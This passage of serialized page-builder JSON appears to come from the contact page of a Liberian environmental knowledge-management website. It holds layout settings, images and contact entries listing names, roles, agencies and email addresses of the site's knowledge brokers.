Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a 